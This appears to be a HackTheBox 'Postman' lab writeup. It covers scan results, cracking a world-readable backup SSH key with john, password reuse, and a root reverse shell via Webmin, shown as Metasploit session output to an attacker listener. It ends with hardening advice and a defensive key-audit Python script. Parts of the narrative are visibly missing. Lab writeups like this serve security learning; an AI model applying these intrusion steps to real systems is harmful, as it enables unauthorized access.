HackTheBox Postman - Writeup
Release Date: 2019/11/02 19:00
# User Part
Starting with an nmap scan gives us the following results:
```text
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_ 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis Redis key-value store
10000/tcp open http MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
```
```text
drwxr-xr-x 2 root root 4096 Sep 11 11:28 .
drwxr-xr-x 22 root root 4096 Aug 25 15:03 ..
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 00:11 id_rsa.bak
```
We've got a private key, probably belonging to the user Matt we found in /etc/passwd. Unfortunately, the key is encrypted with a passphrase, but since the file is world-readable we can download it using scp and try to crack the passphrase with john:
```text
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 4 needed for performance.
1g 0:00:00:15 DONE (2020-02-07 21:20) 0.06583g/s 944153p/s 944153c/s 944153C/s *7¡Vamos!
```
After changing the key file's permissions to 600 (rw-------), we can try to use this private key for SSH authentication as user Matt. Unfortunately, the server immediately closes the connection. Isn't the user allowed to connect via SSH? But we can try another thing: logging back in as user redis and running su to switch to user Matt with the cracked passphrase. And indeed, this works: the passphrase is reused as Matt's login password. We can now easily read the user flag:
# Root Part
Doing some basic enumeration and looking at the process table (ps aux | grep root), we notice that the Webmin app on port 10000 we found before is running as the root user. We will focus on exploiting it.
```text
[*] Started reverse TCP handler on 10.10.x.x:4444
[+] Session cookie: 56e6a17006481c0f7262e772cb3f7074
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.x.x:4444 -> 10.10.10.160:43266) at 2020-02-08 16:34:50 -0500
```
# Additional Notes
Also: run processes with the minimum required permissions only, and try to isolate them from other software and from configuration files they do not need (a Webmin instance running as root turns any bug in it into a full compromise).
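The id_rsa.bak finding in the user part is the kind of exposure an administrator can catch before anyone else does: a passphrase-protected private key left as a world-readable backup copy. The following Python audit is an added example, not part of the original writeup. It walks a directory tree, flags private keys that are world-readable or stored as stray backup copies, and reports whether each one is passphrase-protected (legacy PEM, PKCS#8 and openssh-key-v1 formats); the fixture it builds uses constructed stub files, not real keys.

```python
import base64, binascii, re, stat, struct, tempfile
from pathlib import Path
PEM_BLOCK = re.compile(rb"-----BEGIN ([A-Z ]*PRIVATE KEY)-----\r?\n(.*?)-----END", re.S)
MAGIC = b"openssh-key-v1\x00"  # leading bytes of the openssh-key-v1 binary format

def key_is_encrypted(label, body):
    """Passphrase check for PKCS#8, legacy PEM (the format john handled above) and openssh-key-v1."""
    if label == b"ENCRYPTED PRIVATE KEY" or b"Proc-Type: 4,ENCRYPTED" in body:
        return True
    if label == b"OPENSSH PRIVATE KEY":  # cipher name is the first length-prefixed string after MAGIC
        try:
            raw = base64.b64decode(b"".join(body.split()))
        except binascii.Error:
            return False
        if raw.startswith(MAGIC) and len(raw) >= len(MAGIC) + 4:
            n = struct.unpack(">I", raw[len(MAGIC):len(MAGIC) + 4])[0]
            return raw[len(MAGIC) + 4:len(MAGIC) + 4 + n] != b"none"
    return False

def inspect_key(path):
    """Describe one file if it holds a PEM/OpenSSH private key, else return None."""
    path = Path(path)
    m = PEM_BLOCK.search(path.read_bytes())
    if not m:
        return None
    mode = stat.S_IMODE(path.stat().st_mode)
    return {"path": str(path), "mode": oct(mode), "encrypted": key_is_encrypted(m.group(1), m.group(2)),
            "world_readable": bool(mode & stat.S_IROTH), "backup_copy": path.suffix in {".bak", ".old", ".orig"}}

def audit_private_keys(root):
    """Private keys under root that are world-readable or stray backup copies (skips symlinks, big files)."""
    hits = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and not p.is_symlink() and p.stat().st_size <= 1 << 16:
            info = inspect_key(p)
            if info and (info["world_readable"] or info["backup_copy"]):
                hits.append(info)
    return hits

def build_sample_dir():
    """Constructed fixture (not real keys): id_rsa.bak with mode 755 as in the listing, plus a 600-mode key."""
    d = tempfile.mkdtemp()
    pem = (b"-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
           b"DEK-Info: DES-EDE3-CBC,00112233445566778899AABBCCDDEEFF\n\nQUJD\n-----END RSA PRIVATE KEY-----\n")
    ossh = base64.encodebytes(MAGIC + struct.pack(">I", 4) + b"none")  # cipher "none" = no passphrase
    ossh = b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + ossh + b"-----END OPENSSH PRIVATE KEY-----\n"
    for name, data, mode in (("id_rsa.bak", pem, 0o755), ("id_ed25519", ossh, 0o600)):
        Path(d, name).write_bytes(data)
        Path(d, name).chmod(mode)
    return d
```

Running `audit_private_keys("/home")` (or `/opt`, where such backups tend to end up) as root on a server reports only the exposed keys; a finding that is both `backup_copy` and `world_readable` is exactly the situation this box demonstrates.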